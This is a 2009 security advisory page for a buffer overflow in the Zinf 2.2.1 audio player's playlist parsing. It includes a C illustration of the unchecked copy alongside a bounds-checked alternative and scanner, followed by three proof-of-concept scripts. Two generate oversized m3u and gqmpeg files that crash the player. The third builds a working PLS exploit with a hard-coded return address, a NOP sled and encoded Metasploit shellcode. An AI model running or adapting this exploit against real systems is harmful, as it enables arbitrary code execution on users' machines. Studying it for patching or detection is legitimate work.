Written by Hakxer
Wednesday, 25 March 2009 22:41
Zinf Multiple Playlist Files Buffer Overflow Vulnerability
Bugtraq ID: 33482
Class: Boundary Condition Error
CVE:
Remote: Yes
Local: No
Published: Jan 27 2009 12:00AM
Updated: Mar 25 2009 07:56PM
Credit: Hakxer
Vulnerable: Zinf Zinf 2.2.1
Discussion: Zinf is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the affected user. Failed exploit attempts will likely crash the application.
Zinf 2.2.1 is vulnerable; other versions may also be affected.
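The bug class the discussion describes, as an added illustration that is not part of the original advisory and not Zinf's own code: a playlist line copied into a fixed-size buffer with no length check, next to a checked copy that rejects entries which do not fit, and a scan that counts such oversized entries in an in-memory playlist before it reaches a parser. The buffer size ENTRY_MAX, the function names and the constructed sample playlist are assumptions for this example; the 1300-byte line in the sample is only a size, chosen to match the scale of the overlong entries the PoCs on this page write.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed fixed-size destination buffer for one playlist entry (a path or URL).
   The real size inside Zinf is not stated on the page; 260 is a placeholder. */
#define ENTRY_MAX 260

/* Vulnerable pattern (the class of defect the advisory describes): the line is
   copied with no bounds check. Any line of ENTRY_MAX bytes or more writes past
   the end of 'path'. Shown for contrast only; never called on untrusted input. */
int load_entry_unchecked(const char *line)
{
    char path[ENTRY_MAX];
    strcpy(path, line);               /* no length check: stack overflow */
    return (int)strlen(path);
}

/* Hardened copy: the caller passes the destination size, the copy is refused
   (not silently truncated) when the entry plus terminator would not fit, and
   no byte beyond 'line_len' is read. Returns 0 on success, -1 on rejection. */
int load_entry_checked(const char *line, size_t line_len,
                       char *out, size_t out_size)
{
    if (out_size == 0 || line_len >= out_size)
        return -1;                    /* leave room for the terminator */
    memcpy(out, line, line_len);
    out[line_len] = '\0';
    return 0;
}

/* Defender-side check over a whole playlist held in memory. m3u, pls and
   gqmpeg files are all one-entry-per-line, so a single line walker covers
   them. CRLF line endings are tolerated. Returns the number of lines that the
   checked copy would reject, i.e. entries that would have overflowed. */
int count_oversized_entries(const char *buf, size_t len)
{
    int rejected = 0;
    size_t start = 0;
    char tmp[ENTRY_MAX];

    for (size_t i = 0; i <= len; i++) {
        if (i < len && buf[i] != '\n')
            continue;                 /* not yet at end of line */
        size_t entry_len = i - start;
        if (entry_len > 0 && buf[i - 1] == '\r')
            entry_len--;              /* strip CR of a CRLF ending */
        if (load_entry_checked(buf + start, entry_len, tmp, sizeof tmp) != 0)
            rejected++;
        start = i + 1;
    }
    return rejected;
}

/* Constructed sample (not a real file): a small pls-style playlist whose third
   line is a 1300-byte entry. Returns the number of rejected entries. */
int demo_oversized_count(void)
{
    static char buf[2048];
    const char *head = "[playlist]\nFile1=http://example.invalid/a.mp3\nFile2=";
    size_t n = strlen(head);

    memcpy(buf, head, n);
    memset(buf + n, 'A', 1300);       /* overlong entry, same idea as the PoCs */
    n += 1300;
    buf[n++] = '\n';
    return count_oversized_entries(buf, n);
}

int main(void)
{
    printf("oversized entries in sample playlist: %d\n", demo_oversized_count());
    return 0;
}
```

The check refuses rather than truncates because a truncated path or URL silently changes what the player opens; refusing keeps the failure visible and makes a malformed playlist easy to log.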
Exploit(s)/PoC(s): The following proof-of-concept and exploit examples are available:
===============================================================
33482-gqmpeg.pl
^^^^^^^^^^^^^^^^
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 ( gqmpeg FILE) Buffer Overflow PoC
# Greetz to : Egyptianxhacker,ProViDoR , Br1ght D@rk , Error Code , Kof2002 , Sql_Inj3ct0r ,
# egy coders team , Sec-geeks.com
my $deamoddd="http://"."A" x 70000;
open(MYFILE,'>>hakxer.gqmpeg');
print MYFILE $deamoddd;
close(MYFILE);
print "PoC Created .. Hakxer [sec-geeks.com] EgY Coders Team";
===============================================================
33482-m3u.pl
^^^^^^^^^^^^^
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow
my $chars="http://"."A" x 50000;
open(MYFILE,'>>hakxer.m3u');
print MYFILE $chars;
close(MYFILE);
print " Done";
===============================================================
33482-pls.py
^^^^^^^^^^^^^
#!/usr/bin/perl -w
# Author : Houssamix
# Zinf Audio Player 2.2.1 (PLS File) Universal Local Buffer Overflow exploit
# tested in windows pro Sp 2 (french)
print "===================================================================== \n";
print "Author : Houssamix \n";
print "===================================================================== \n";
print "Zinf Audio Player 2.2.1 Universal Local Buffer Overflow exploit \n";
print "===================================================================== \n";
my $overflow = "\x41" x 1300;
my $ret = "\xC8\x2C\x00\x10"; # 0x10002CC8 push esp - ret > universal address (vorbisfile.dll)
my $nop = "\x90" x 128;
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x58".
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x53\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54".
"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43".
"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x58\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x43".
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x36".
"\x4e\x56\x43\x36\x42\x50\x5a";
my $file = "hsmx.pls";
$exploit = $overflow.$ret.$nop.$shellcode;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit;
close($FILE);
print "$file has been created \n";
Solution: Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us.
References: Zinf Homepage http://www.zinf.org (Zinf)